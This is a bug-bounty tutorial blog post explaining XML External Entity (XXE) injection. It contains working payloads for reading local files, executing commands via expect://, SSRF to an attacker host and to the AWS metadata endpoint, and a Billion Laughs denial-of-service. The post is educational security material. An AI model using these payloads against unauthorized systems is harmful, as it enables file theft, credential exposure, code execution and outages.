Introduction
Every time I see an opportunity to attempt an XML External Entity (XXE) injection attack I get excited. In my experience, it has a high chance of success compared to many other vulnerability types. Many XXE exploitation methods require multiple steps and often go undetected by automated scanners, which makes XXE a great vulnerability class to try on more mature bug bounty programs. Better still, XXE is often of critical severity, and can even result in remote code execution in some cases.
A while back, @bugcrowd tweeted about some methods for discovering and exploiting XXE vulnerabilities. Twitter is not the ideal medium for relaying swathes of technical information, so this blog post aims to fill in the gaps!
What is XXE?
XML External Entity (XXE) injection occurs when Extensible Markup Language (XML) is provided as user input and processed on the server in a way that parses external entities. It sounds more complicated than it is, so keep reading! XXE can often be exploited to read arbitrary local files, perform Server-Side Request Forgery (SSRF), cause Denial of Service (DoS), and sometimes even achieve Remote Code Execution (RCE).
To fully understand XXE, we must first understand XML. XML is quite an abstract concept but in essence, it is just a format for sending and receiving information. Below is an example of XML.
<car>
<color>Red</color>
<brand>Ferrari</brand>
<topspeed>340 km/h</topspeed>
</car>
And this is also an example of XML:
<blogs>
<blog>
<title>How to Find XXE Burgers</title>
<summary>XXE bugs are great, but have you tried XXE burgers?</summary>
<body>Don’t waste your time searching for bugs. Burgers are far more delicious.</body>
</blog>
<blog>
<title>10 Cat Pics That Will Make You Question Everything</title>
<summary>Some cats are cute, but these cats will literally make you quit your day job.</summary>
<body>Cats cats cats. More cats and cats.</body>
</blog>
</blogs>
Some important things to note about the above examples:
- There are no predefined tags (the bits inside < > characters). The XML standard allows naming tags anything you want. It is worth noting that XML tags are case-sensitive (Speed is different to speed), unlike HTML.
- The tags are self descriptive. It is plain to see that the first example is describing a car, and the second is describing a blog with two posts.
- It is hierarchical. For example, the “title” element is inside the “blog” element, which is inside the “blogs” element.
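To make those points concrete, here is a minimal sketch that parses the car example and walks its hierarchy. Python and its standard xml.etree.ElementTree module are my choice for illustration only, and the describe helper is a hypothetical name, not part of any library.

```python
import xml.etree.ElementTree as ET

# The car example from above, as a string.
CAR_XML = """<car>
<color>Red</color>
<brand>Ferrari</brand>
<topspeed>340 km/h</topspeed>
</car>"""


def describe(xml_text):
    """Return the root tag and a dict mapping each child tag to its text."""
    root = ET.fromstring(xml_text)
    return root.tag, {child.tag: child.text for child in root}


if __name__ == "__main__":
    tag, fields = describe(CAR_XML)
    print(tag, fields)
    # Tags are case-sensitive: looking up "Brand" does not find <brand>.
    print(ET.fromstring(CAR_XML).find("Brand"))
```

The lookup for "Brand" finds nothing because the element is actually named "brand", which is the case-sensitivity point from the list above.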
If you have read this far, you might be wondering why you would use XML over JSON. To explain the difference, let’s take a look at another XML example:
<?xml version="1.0"?>
<!DOCTYPE replace [<!ENTITY brand "Ferrari"> ]>
<vehicle>
<type>Car</type>
<brand>&brand;</brand>
</vehicle>
In this example, we use an “entity”. On the second line, we called the entity “brand”, and we assigned it the value “Ferrari”. Then, on line 5, you can see that we used the syntax &brand; which will be replaced by “Ferrari” when the XML is parsed. If you have done any programming, it would help to think of an XML entity as a variable.
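If you want to see the substitution happen, the sketch below feeds the same document to Python's standard xml.etree.ElementTree parser, which expands entities declared inside the document itself. The read_brand helper is a hypothetical name used just for this example.

```python
import xml.etree.ElementTree as ET

# The vehicle example from above, including its DOCTYPE and entity.
VEHICLE_XML = """<?xml version="1.0"?>
<!DOCTYPE replace [<!ENTITY brand "Ferrari"> ]>
<vehicle>
<type>Car</type>
<brand>&brand;</brand>
</vehicle>"""


def read_brand(xml_text):
    """Parse the document and return the text of the <brand> element."""
    root = ET.fromstring(xml_text)
    return root.findtext("brand")


if __name__ == "__main__":
    # By the time we read the element, &brand; has already been replaced.
    print(read_brand(VEHICLE_XML))
```

The application code never sees the &brand; reference; the parser resolves it before handing the data over, which is exactly why entities are interesting from a security point of view.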
In this case we’ve just replaced the entity with text which is quite harmless but there are other types of XML entities that are far more interesting. For example, see below:
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<vehicle>
<type>Car</type>
<brand>&test;</brand>
</vehicle>
As you might have guessed, this example sets the “test” entity to the contents of the /etc/passwd file, then we use &test; within the XML body to embed the contents of /etc/passwd into the <brand> element.
If a vulnerable application received this XML as user input to add a car into a database, the “brand” field would be populated with the contents of /etc/passwd, which may be reflected back into the application. In that case, a user of the web application could exploit this to ultimately read the contents of local files on the web server. When this occurs, the application is vulnerable to XXE.
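Not every parser behaves this way. As a point of comparison, the sketch below passes the same payload to Python's standard xml.etree.ElementTree, which, as far as I know, does not resolve external entities and rejects the reference instead. The try_parse helper is a hypothetical name, and the behaviour of other parsers and versions will vary.

```python
import xml.etree.ElementTree as ET

# The external entity example from above.
XXE_XML = """<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<vehicle>
<type>Car</type>
<brand>&test;</brand>
</vehicle>"""


def try_parse(xml_text):
    """Return the <brand> text, or None if the parser rejects the document."""
    try:
        return ET.fromstring(xml_text).findtext("brand")
    except ET.ParseError:
        # ElementTree treats the unresolved external entity as an error.
        return None


if __name__ == "__main__":
    print(try_parse(XXE_XML))
    print(try_parse("<vehicle><brand>Ferrari</brand></vehicle>"))
```

An application is only vulnerable when its parser is willing to fetch what the SYSTEM identifier points to, so the parser and its configuration are the first things to identify when testing.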
Where to look for XXE?
In a nutshell, XXE should be tested whenever XML is parsed, which is probably more common than you think. Below is a list of ideas:
- XML APIs
- SOAP APIs
- Anywhere that a Microsoft Office (docx/xlsx/pptx/etc.) file is parsed. These are just zip files filled with XML files.
- RSS feed parsers (RSS feeds are just XML)
- SAML Authentication
- HTML parsing (for example, converting HTML to a PDF)
- Functionality that parses sitemap.xml files
- Functionality that parses SVG files
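To illustrate the point about Office files being zip archives of XML, here is a small sketch that lists the XML members of such an archive using Python's standard zipfile module. Both helper names are hypothetical, and the sample archive is a tiny stand-in built in memory, not a valid Office document.

```python
import io
import zipfile


def list_xml_members(file_bytes):
    """Return the names of the .xml members inside a zip-based document."""
    with zipfile.ZipFile(io.BytesIO(file_bytes)) as archive:
        return [name for name in archive.namelist() if name.endswith(".xml")]


def make_sample_archive():
    """Build a tiny stand-in archive in memory (not a valid Office file)."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("[Content_Types].xml", "<Types/>")
        archive.writestr("word/document.xml", "<document/>")
        archive.writestr("word/media/image1.png", b"not really a png")
    return buffer.getvalue()


if __name__ == "__main__":
    print(list_xml_members(make_sample_archive()))
```

Each XML member is a place where a payload could be planted before the file is uploaded to a target that parses it.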
Exploitation methods
Here are some more exploitation methods that may be possible with XXE. Most of these have been adapted from OWASP’s XXE guide which is another great resource for learning about XXE.
Arbitrary File Read on Windows
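Here we use the boot.ini file, which exists on older Windows systems (the Windows XP and Server 2003 era). On newer versions, a file such as c:/windows/win.ini is a common substitute. For a Linux example, see above.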
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
<foo>&xxe;</foo>
Remote Code Execution
If we’re lucky and the PHP expect module is loaded, we may be able to execute arbitrary commands. In this case we are running the id command.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo
[<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
Server-Side Request Forgery via XXE
In this example, instead of accessing a local file, we are accessing an HTTP address, which can be great for testing blind XXE vulnerabilities. To do this, you can set up a web server and watch the logs as you exploit the vulnerability to see if you receive any HTTP requests. If you do, bingo!
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]>
<foo>&xxe;</foo>
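If you don't have a web server handy, the listener side can be sketched with Python's standard http.server module. This is only one possible setup: CallbackHandler, start_listener and send_test_request are hypothetical names, and send_test_request merely simulates locally the request that a vulnerable parser would make.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class CallbackHandler(BaseHTTPRequestHandler):
    """Record every GET request so blind XXE callbacks are easy to spot."""

    def do_GET(self):
        # Remember who called and which path they asked for.
        self.server.hits.append((self.client_address[0], self.path))
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, format, *args):
        pass  # hits are kept on the server object instead of stderr


def start_listener(host="127.0.0.1", port=0):
    """Start the listener in a background thread; port 0 picks a free port."""
    server = HTTPServer((host, port), CallbackHandler)
    server.hits = []
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def send_test_request(server, path):
    """Simulate a callback locally; returns (status, body)."""
    host, port = server.server_address[:2]
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", path)
        response = conn.getresponse()
        return response.status, response.read()
    finally:
        conn.close()
```

In practice you would bind the listener to an address the target can reach, put that address in the SYSTEM identifier, and check server.hits after sending the payload.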
If it isn’t a blind XXE, i.e. you can see the contents of the entity, you could use this for some very nefarious things including accessing the AWS metadata endpoint.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/" >]>
<foo>&xxe;</foo>
Billion Laughs Attack (DoS)
This is my personal favorite, not for impact, but for ingenuity and troll-factor. A word of warning: don’t attempt this on a production system (a production system being any live website that a customer’s users or staff would also be using).
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
First, we define an entity lol as “lol”. Then we define lol1 as lol x 10, which would end up being:
lollollollollollollollollollol
Then we define lol2 as lol1 x 10, which ends up being:
Lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol
Then we define lol3 as lol2 x 10, which ends up being:
lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollo
llollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol
Then lol4 is 10 x lol3, and so on. The length of the string grows exponentially until lol9 expands to one billion “lol”s. This amount of processing, and the sheer size of the string, causes a denial of service as the XML parser quickly exhausts the system’s resources.
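The arithmetic is easy to check. The sketch below only calculates the sizes and never builds the string; expanded_size is a hypothetical helper, and its defaults (nine levels, ten references per level, a three-character base string) mirror the payload above.

```python
def expanded_size(levels=9, fanout=10, base="lol"):
    """Return (copies of base, total characters) for the top-level entity."""
    copies = fanout ** levels
    return copies, copies * len(base)


if __name__ == "__main__":
    for level in range(1, 10):
        copies, chars = expanded_size(level)
        print(f"lol{level}: {copies:,} copies, {chars:,} characters")
```

At nine levels that is 3,000,000,000 characters, roughly 3 GB of text, produced from a payload that is itself only around a kilobyte.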
More Payloads
Now that you know the basics of XXE exploitation, you will have a better understanding of more complex XXE vectors. For a great list of payloads and ideas for exploitation, check out Swissky’s “Payloads All The Things” repository here:
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection
Let’s Try It!
If you’re looking for somewhere to try out your XXE skills, check out our programs that have web assets.
Stay in Touch
If you’d like to get more involved with the Bugcrowd community, you can join our Discord, follow us on Twitter, or check out our video content on YouTube including loads of technical content for bug bounty hunters.
If you’d like to see more from the author personally, follow hakluke on Twitter, YouTube, Instagram or check out his website.